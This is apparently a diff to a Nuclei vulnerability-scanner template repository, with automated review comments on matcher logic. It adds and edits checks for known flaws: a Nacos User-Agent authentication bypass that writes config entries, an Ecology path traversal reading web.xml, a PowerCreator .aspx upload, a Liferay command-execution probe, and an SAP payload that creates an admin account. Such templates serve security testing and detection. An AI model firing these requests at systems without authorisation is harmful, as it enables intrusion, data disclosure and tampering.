diff --git a/README.md b/README.md
index 798e2dbde5..092bb7d343 100644
--- a/README.md
+++ b/README.md
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
-| takeovers | 68 | exposures | 91 | technologies | 66 |
-| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
+| cves | 306 | vulnerabilities | 147 | exposed-panels | 124 |
+| takeovers | 68 | exposures | 92 | technologies | 66 |
+| misconfiguration | 56 | workflows | 30 | miscellaneous | 20 |
 | default-logins | 24 | exposed-tokens | 0 | dns | 8 |
 | fuzzing | 8 | helpers | 8 | iot | 11 |
-**102 directories, 1049 files**.
+**103 directories, 1054 files**.
diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml
index dcbf8b8b71..8f6e44259c 100644
--- a/cves/2020/CVE-2020-35951.yaml
+++ b/cves/2020/CVE-2020-35951.yaml
@@ -68,7 +68,7 @@ requests:
 - "not found in ([/a-z_]+)wp"
 req-condition: true
- matchers-condition: or
+ matchers-condition: and
 matchers:
 - type: word
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 27f48e35b2..2d5c79bace 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -12,16 +12,6 @@ info:
 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
- # Affected Versions: 7.30, 7.31, 7.40, 7.50
-
- # p.s:
- # > Don't forget to change the default credentials
- # > to create new admin in associated file:
- # > `payloads/CVE-2020-6287.xml`
-
- # Ref:
- # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
-
 requests:
 - payloads:
 data: helpers/payloads/CVE-2020-6287.xml
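Review bot: The deleted comment block in CVE-2020-6287.yaml carried two things that belong in `info` rather than being dropped: the affected-version list and the operator note that the payload file creates a new admin account with default credentials that should be changed before use. Suggest adding `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287` to the existing `reference` list and a `description` sentence stating that the check is state-changing (it submits `helpers/payloads/CVE-2020-6287.xml`, which the old note says creates an admin user) so scan operators know to review and clean up afterwards. The old comment also referred to `payloads/CVE-2020-6287.xml` while the template loads `helpers/payloads/CVE-2020-6287.xml`; if the note is restored, use the path the template actually reads. The `info` block starts before this hunk.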
@@ -41,4 +31,9 @@ requests:
 part: body
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
+
+ - type: word
+ words:
+ - "text/xml"
+ part: header
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 9c41f7756c..e552deef58 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -15,7 +15,6 @@ requests:
 command:
 - "systeminfo" # Windows
 - "lsb_release -a" # Linux
- - "sysctl kern.ostype" # macOS
 attack: sniper
 raw:
@@ -40,16 +39,15 @@ requests:
 regex:
 - "OS Name:.*Microsoft Windows"
 - "Distributor ID:"
- - "kern\\.ostype"
 condition: or
 part: body
 - type: status
 status:
 - 200
+
 extractors:
 - type: regex
 part: body
 regex:
 - "Microsoft Windows (.*)"
- - "kern\\.ostype: (.*)"
 - "Distributor ID: (.*)"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml
index 334555dc68..4a7f5a15fd 100644
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@@ -34,3 +34,8 @@ requests:
 - type: status
 status:
 - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml
new file mode 100644
index 0000000000..b1d13ad24d
--- /dev/null
+++ b/cves/2021/CVE-2021-29441.yaml
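Review bot: The added `text/xml` header matcher in CVE-2020-6287.yaml only tightens the check if the template's `matchers-condition` is `and`, and that key is outside this hunk; please confirm it, because under `or` this matcher alone would fire on any XML response. `text/xml` is a generic content type, so the `part: body` matcher above should remain the primary evidence and a one-line comment such as `# secondary check: response must be XML` would make the intent clear to the next reader. The new last line is still written without a trailing newline (`\ No newline at end of file`); add one so later diffs stay clean.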
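Review bot: `text/html` in the response headers is present on practically every web page, so the new word matcher in CVE-2020-8191.yaml adds no evidence for the finding. Whether it is harmless or harmful depends on `matchers-condition`, which is outside this hunk: under `and` it is a no-op, under `or` it would make the template match any HTML page. Consider dropping it, or if the intent is to exclude JSON or redirect responses, say so in a comment above the matcher, e.g. `# excludes non-HTML responses; the body matcher carries the detection`. The file also still ends without a newline.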
@@ -0,0 +1,49 @@
+id: CVE-2021-29441
+
+info:
+ name: Nacos prior to 1.4.1 Authentication Bypass
+ description: |
+ This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
+
+ In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
+ Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
+ enables Nacos servers to bypass this filter and therefore skip authentication checks.
+ This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
+ This issue may allow any user to carry out any administrative tasks on the Nacos server.
+ author: dwisiswant0
+ severity: high
+ reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+ tags: nacos,auth-bypass,cve,cve2021
+
+requests:
+ - raw:
+ - |
+ POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ - |
+ POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ User-Agent: Nacos-Server
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 403"
+ - "status_code_2 == 200"
+ condition: and
+
+ - type: dsl
+ dsl:
+ - "contains(body_1, 'Forbidden')"
+ - "contains(body_2, 'true')"
+ condition: and
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
\ No newline at end of file
diff --git a/exposures/files/gogs-install-exposure.yaml b/exposures/files/gogs-install-exposure.yaml
new file mode 100644
index 0000000000..a7369b2cb4
--- /dev/null
+++ b/exposures/files/gogs-install-exposure.yaml
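Review bot: Both raw requests are writes — each POST publishes a config entry (`dataId=nacos.cfg.dataIdfoo`, `group=foo`, `content=helloWorld`) on the target — yet nothing in `info` tells an operator that the check leaves data behind; add a sentence to `description` naming the entry that gets created so it can be removed after a scan. The Nuclei engine-version caveat on the first description line is tooling advice rather than a description of the vulnerability; move it to a `# ` comment above `requests:` and keep `description` to the CVE itself. `reference` is a plain scalar here while the other templates in this diff (e.g. CVE-2020-6287.yaml) use a list (`- https://...`); use the list form for consistency. The file ends without a trailing newline.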
@@ -0,0 +1,25 @@
+id: gogs-install-exposure
+
+info:
+ name: Gogs install exposure
+ author: dhiyaneshDk
+ severity: high
+ tags: gogs,exposure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/install'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "General Settings"
+ - "Database Settings"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
index 02c4ff5b64..009f96d571 100644
--- a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
+++ b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
@@ -21,5 +21,6 @@ requests:
 - type: word
 words:
 - '{{randstr}}'
- - 'suggestions'
+ - '"results":'
+ - '"suggestions":'
 condition: and
diff --git a/misconfiguration/nginx-status.yaml b/misconfiguration/nginx/nginx-status.yaml
similarity index 93%
rename from misconfiguration/nginx-status.yaml
rename to misconfiguration/nginx/nginx-status.yaml
index 89c66665d6..0213a72eb5 100644
--- a/misconfiguration/nginx-status.yaml
+++ b/misconfiguration/nginx/nginx-status.yaml
@@ -4,7 +4,7 @@ info:
 name: Nginx Status Page
 author: dhiyaneshDK
 severity: low
- tags: config,nginx
+ tags: misconfig,nginx
 requests:
 - method: GET
diff --git a/misconfiguration/nginx/nginx-vhost-traffic-status.yaml b/misconfiguration/nginx/nginx-vhost-traffic-status.yaml
new file mode 100644
index 0000000000..f6f6f728ca
--- /dev/null
+++ b/misconfiguration/nginx/nginx-vhost-traffic-status.yaml
@@ -0,0 +1,25 @@
+id: nginx-vhost-traffic-status
+
+info:
+ name: Nginx Vhost Traffic Status
+ author: geeknik
+ reference: https://github.com/vozlt/nginx-module-vts
+ severity: low
+ tags: status,nginx,misconfig
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/status"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nginx Vhost Traffic Status"
+ - "Host"
+ - "Zone"
+ condition: and
+ - type: status
+ status:
+ - 200
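Review bot: gogs-install-exposure.yaml has no `description` or `reference`, so a reader cannot tell why a reachable `/install` page is rated `high`; add a `description` stating what the page allows (presumably the initial setup form, given that `General Settings` and `Database Settings` are the words matched — confirm) and a `reference` to the Gogs documentation. The path uses single quotes (`'{{BaseURL}}/install'`) while the matcher words use double quotes; pick one quoting style per file.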
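Review bot: In nginx-vhost-traffic-status.yaml the bare words `Host` and `Zone` are too generic to add discrimination — they are likely to appear on many unrelated pages — so under `condition: and` they mainly risk missing a customized status page rather than cutting false positives; the `Nginx Vhost Traffic Status` title is the real signal. Either drop the two generic words or add a comment above `words:` explaining why they are required. The `status` tag does not match the tag vocabulary used elsewhere in this diff (`misconfig`, `nginx`), a blank line before `- type: status` would match the layout of the other new templates, and there is no `description`.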
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index c2d10fe491..6164d7c1cd 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -16,10 +16,10 @@ requests:
 - type: regex
 part: header
 regex:
- - kong+
+ - "[Ss]erver: [Kk]ong+"
 extractors:
- - type: regex
+ - type: kval
 part: header
- regex:
- - .*kong.*
+ kval:
+ - server
diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
new file mode 100644
index 0000000000..3ebe236378
--- /dev/null
+++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
@@ -0,0 +1,20 @@
+id: ecology-filedownload-directory-traversal
+info:
+ name: Ecology Directory Traversal
+ author: princechaddha
+ severity: medium
+ tags: ecology,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "/weaver/"
+ part: body
diff --git a/vulnerabilities/other/gloo-unauth.yaml b/vulnerabilities/other/gloo-unauth.yaml
new file mode 100644
index 0000000000..4a27ed3b2d
--- /dev/null
+++ b/vulnerabilities/other/gloo-unauth.yaml
@@ -0,0 +1,32 @@
+id: gloo-unauth
+
+info:
+ name: Unauthenticated Gloo UI
+ author: dhiyaneshDk
+ severity: high
+ tags: unauth,gloo
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails'
+ headers:
+ User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
+ Content-type: "application/grpc-web+proto"
+ Referer: "{{BaseURL}}/admin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "gke-remote"
+ part: body
+
+ - type: word
+ words:
+ - "application/grpc-web+proto"
+ part: header
+
+ - type: status
+ status:
+ - 200
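Review bot: In kong-detect.yaml the new pattern `"[Ss]erver: [Kk]ong+"` applies `+` only to the final `g`, so it matches `kong`, `kongg`, … rather than "kong followed by anything", which is presumably what the old `kong+` was reaching for. Because the regex matcher already succeeds on a substring, `- "[Ss]erver: [Kk]ong"` is sufficient; if the intent is to require a version suffix, state it explicitly, e.g. `- "[Ss]erver: [Kk]ong/[0-9.]+"`. A one-line comment above `regex:` naming the header being fingerprinted would also help, since the `kval` extractor on `server` now depends on that same header being present.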
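Review bot: In ecology-filedownload-directory-traversal.yaml the only content check is the word `/weaver/` in the body, which does not demonstrate that `WEB-INF/web.xml` was actually returned — an ordinary Ecology page whose HTML links under `/weaver/` could satisfy it together with the 200. Match something only the retrieved file contains, such as the `<web-app` root element or a `<servlet-mapping>` tag, under `condition: and`, so the finding is evidence-backed and false positives drop. The template also lacks `description` and `reference` entries and omits the blank line between `id:` and `info:` that the other new templates in this diff use.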
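Review bot: In gloo-unauth.yaml the body matcher requires the literal `gke-remote`, which reads like a cluster-name value from one particular deployment (presumably the author's test environment); under `matchers-condition: and` every installation whose clusters are named differently will be missed. A detection should key on the structure of the `ListClusterDetails` response rather than on a deployment-specific value; if no structural marker is available from the gRPC-web payload, add a comment above `words:` explaining why this literal is used and its coverage limit. Header key style is mixed (`User-Agent` vs `Content-type`); `Content-Type` is the conventional spelling. `description` and `reference` are absent.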
diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml
index 9b8b5067f9..c898de0884 100644
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@@ -21,7 +21,7 @@ requests:
 Content-Disposition: form-data; name="file1"; filename="poc.aspx"
 Content-Type: image/jpeg
- Poc_Test
+ {{randstr}}
 -----------------------------20873900192357278038549710136--
 - |
@@ -38,7 +38,8 @@ requests:
 regex:
 - "(.*?.ASPX)"
+ req-condition: true
 matchers:
 - type: dsl
 dsl:
- - "contains(body, 'Poc_Test') && status_code == 200"
\ No newline at end of file
+ - "contains(body_2, '{{randstr}}') && status_code_2 == 200"
\ No newline at end of file
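Review bot: The DSL line now compares `body_2` against `{{randstr}}`, which is only correct if the engine substitutes the same random value here as in the multipart body of the first raw request (first hunk); the `aem-wcm-suggestions-servlet.yaml` hunk in this same diff relies on `{{randstr}}` inside a word matcher, so substitution in matchers is evidently supported, but please confirm it also holds inside `dsl` strings and that the value is generated once per template run, otherwise the matcher can never fire. Separately, the extractor regex `"(.*?.ASPX)"` on the context line uses an unescaped `.` before `ASPX`, which matches any character rather than a dot; `"(.*?\\.ASPX)"` is what was likely intended. The file still ends without a trailing newline, and a `# ` comment above `req-condition: true` noting that the match is against the second response would help the next reader.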